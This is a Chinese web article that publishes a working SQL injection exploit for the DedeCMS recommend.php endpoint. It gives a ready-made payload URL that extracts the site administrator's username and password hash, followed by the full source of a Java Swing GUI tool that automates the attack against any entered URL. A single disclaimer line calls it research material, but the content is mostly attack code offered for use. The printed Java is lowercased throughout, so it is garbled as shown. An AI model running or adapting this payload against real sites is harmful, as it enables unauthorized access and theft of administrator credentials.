DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日

dedecms即织梦(php开源网站内容管理系统)。织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的php开源网站管理系统,也是使用用户最多的php类cms系统。

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日



近日,网友在dedecms中发现了全版本通杀的sql注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:

exp:


复制代码
代码如下:

http://*.*.com/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=111


直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日



利用工具源码(by 园长):


复制代码
代码如下:

package org.javaweb.dede.ui;

import java.awt.toolkit;
import java.io.bufferedreader;
import java.io.inputstreamreader;
import java.net.url;
import java.util.regex.matcher;
import java.util.regex.pattern;

/**
*
* @author yz
*/
public class mainframe extends javax.swing.jframe {

private static final long serialversionuid = 1l;

/**
* creates new form mainframe
*/
public mainframe() {
initcomponents();
}

public string request(string url){
string str = "",tmp;
try {
bufferedreader br = new bufferedreader(new inputstreamreader(new url(url).openstream()));
while((tmp=br.readline())!=null){
str+=tmp+"\r\n";
}
} catch (exception e) {
jtextarea1.settext(e.tostring());
}
return str;
}

private void initcomponents() {

jpanel1 = new javax.swing.jpanel();
jlabel1 = new javax.swing.jlabel();
jtextfield1 = new javax.swing.jtextfield();
jbutton1 = new javax.swing.jbutton();
jscrollpane1 = new javax.swing.jscrollpane();
jtextarea1 = new javax.swing.jtextarea();

setdefaultcloseoperation(javax.swing.windowconstants.exit_on_close);

jlabel1.settext("url:");
jtextfield1.settext("<a href="http://localhost">http://localhost</a>");

this.settitle("dedecms recommend.php注入利用工具-p2j.cn");

int screenwidth = toolkit.getdefaulttoolkit().getscreensize().width;
int screenheight = toolkit.getdefaulttoolkit().getscreensize().height;
this.setbounds(screenwidth / 2 - 229, screenheight / 2 - 158, 458, 316);

jbutton1.settext("获取");
jbutton1.addactionlistener(new java.awt.event.actionlistener() {
public void actionperformed(java.awt.event.actionevent evt) {
jbutton1actionperformed(evt);
}
});

jtextarea1.setcolumns(20);
jtextarea1.setrows(5);
jscrollpane1.setviewportview(jtextarea1);

javax.swing.grouplayout jpanel1layout = new javax.swing.grouplayout(jpanel1);
jpanel1.setlayout(jpanel1layout);
jpanel1layout.sethorizontalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.trailing, false)
.addcomponent(jscrollpane1, javax.swing.grouplayout.alignment.leading)
.addgroup(javax.swing.grouplayout.alignment.leading, jpanel1layout.createsequentialgroup()
.addcontainergap()
.addcomponent(jlabel1)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jtextfield1, javax.swing.grouplayout.preferred_size, 331, javax.swing.grouplayout.preferred_size)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jbutton1, javax.swing.grouplayout.preferred_size, 83, javax.swing.grouplayout.preferred_size)))
.addgap(0, 0, short.max_value))
);
jpanel1layout.setverticalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addcontainergap()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.baseline)
.addcomponent(jlabel1)
.addcomponent(jtextfield1,
javax.swing.grouplayout.preferred_size,
javax.swing.grouplayout.default_size,
javax.swing.grouplayout.preferred_size)
.addcomponent(jbutton1))
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jscrollpane1, javax.swing.grouplayout.default_size, 254, short.max_value))
);

javax.swing.grouplayout layout = new javax.swing.grouplayout(getcontentpane());
getcontentpane().setlayout(layout);
layout.sethorizontalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);
layout.setverticalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);

pack();
}// </editor-fold>

private void jbutton1actionperformed(java.awt.event.actionevent evt) {
string url = jtextfield1.gettext();
if(null==url||"".equals(url)){
return ;
}
string result = request(url+"/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=4294");
matcher m = pattern.compile("<h2>(.*)</h2>").matcher(result);
if(m.find()){
string[] s = m.group(1).split("\\|");
if(s.length>2){
jtextarea1.settext("username:"+s[1]+"\r\nmd5:"+s[2].substring(3,s[2].length()-1));
}
}
}

public static void main(string args[]) {
java.awt.eventqueue.invokelater(new runnable() {
public void run() {
new mainframe().setvisible(true);
}
});
}

// variables declaration - do not modify
private javax.swing.jbutton jbutton1;
private javax.swing.jlabel jlabel1;
private javax.swing.jpanel jpanel1;
private javax.swing.jscrollpane jscrollpane1;
private javax.swing.jtextarea jtextarea1;
private javax.swing.jtextfield jtextfield1;
// end of variables declaration
}


利用工具下载地址 http://pan.baidu.com/s/1i37lunf (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日

dedecms官方补丁地址:

猜你喜欢